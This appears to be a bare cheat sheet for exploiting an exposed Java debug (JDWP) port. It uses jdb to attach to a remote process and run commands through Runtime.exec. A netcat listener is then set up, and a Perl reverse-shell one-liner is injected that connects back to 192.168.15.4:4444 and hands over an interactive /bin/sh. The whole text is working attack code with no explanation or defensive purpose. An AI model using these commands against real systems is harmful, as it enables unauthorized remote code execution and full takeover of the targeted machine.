jdb -attach 127.0.0.1:8000
version
stop in java.lang.String.equals
print java.lang.System.out.println("a");
java.lang.Runtime.getRuntime().exec("touch /tmp/moo");

--------------------------------------------------------

nc -l 4444

java.lang.Runtime.getRuntime().exec(new java.lang.String[]{"/bin/sh","-c","perl -e 'use Socket;$i=\"192.168.15.4\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"});
